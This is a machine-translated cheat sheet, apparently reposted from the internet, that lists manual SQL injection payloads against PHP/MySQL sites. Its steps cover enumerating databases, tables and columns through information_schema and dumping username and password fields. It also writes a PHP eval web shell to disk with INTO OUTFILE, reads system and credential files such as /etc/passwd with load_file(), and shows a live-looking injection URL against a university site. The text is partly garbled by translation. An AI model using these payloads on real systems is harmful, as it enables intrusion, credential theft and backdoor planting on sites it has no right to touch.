Php+mysql Manual Injection statement Daquan recommended _php Skills

Source: Internet
Author: User
Tags mysql manual

Burst field length

ORDER BY num/*


Matching fields

and 1=1 Union Select 1,2,3,4,5.......n/*


Storm field position

and 1=2 Union Select 1,2,3,4,5.....n/*


Using built-in functions to storm database information

Version () database () User ()

No guessing available field Storm database information (some sites do not apply):

and 1=2 UNION ALL Select Version ()/*

and 1=2 UNION ALL Select Database ()/*

and 1=2 union ALL Select User ()/*

Operating System Information:

and 1=2 UNION ALL SELECT @ @global. version_compile_os from Mysql.user/*

Database permissions:

and Ord (Mid (User (), 1, 1)) =114/* Returns the normal description as root

Bauku (mysql>5.0)

MySQL more than 5 has built-in library information_schema, storage of MySQL all the database and table structure information

and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1

Guess table

and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hexadecimal) limit 0 (start record, 0 is first start record), 1 (show 1 Records)-


Guessing field

and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hexadecimal) limit 0,1


Mob password

and 1=2 Union Select 1,2,3, username segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced Usage ( One available field displays two data contents):

Union Select 1,2,3concat (username segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1

Direct Write horse (Root permission)

Conditions: 1, know the site physical path

2, have sufficient permission (can use Select .... from Mysql.user test)

3, MAGIC_QUOTES_GPC () =off

Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '

and 1=2 union ALL Select a Word hex value into outfile ' path '


Load_file () Common path:


1, replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2. Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (+), char (32))
The top two are to view the full display code in a php file. Some times do not replace some characters, such as "<" replaced by "space" to return to the Web page. And you can't see the code.
3, Load_file (char (47)) can list the Freebsd,sunos system root directory
4,/etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf view Linux Apache virtual Host configuration file
5, C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view the Windows system Apache file
6, c:/resin-3.0.14/conf/resin.conf View JSP development of the website Resin file configuration information.
7, c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf view the Linux system configuration JSP virtual host
8, d:\APACHE\Apache2\conf\httpd.conf
9, C:\Program Files\mysql\my.ini
Ten 、.. /themes/darkblue_orange/layout.inc.php phpMyAdmin Explosion Path
11. C:\windows\system32\inetsrv\MetaBase.xml View the IIS virtual host configuration file
12,/usr/local/resin-3.0.22/conf/resin.conf for 3.0.22 resin configuration file View
13,/usr/local/resin-pro-3.0.22/conf/resin.conf-ditto
14,/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe Virtual host view
15,/etc/sysconfig/iptables to see the firewall strategy
16, Usr/local/app/php5 B/php.ini PHP is quite set
17,/etc/my.cnf mysql configuration file
18, the system version of/etc/redhat-release Red Hat
19, C:\mysql\data\mysql\user. MYD exists a user password in the MySQL system
20,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21,/USR/LOCAL/APP/PHP5 B/php.ini//php Related Settings
22,/usr/local/app/apache2/conf/extra tpd-vhosts.conf//virtual Site Settings
23,C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24, C:\windows\my.ini
25, C:\Boot.ini

website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (), char (32))

Note:

Char ( < )

Char (in) denotes a space

Problems with manual injection:

When the injection page shows:

Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '

such as:Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_ File (0x433a5c626f6f742e696e69), 3,4,user ()%20

This is due to inconsistent coding,

Workaround: Add Unhex (Hex (parameters)) to the parameter before it is ready. The above URL can be changed to:

Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex ( Hex (Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ()))%20

Can continue to inject ...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.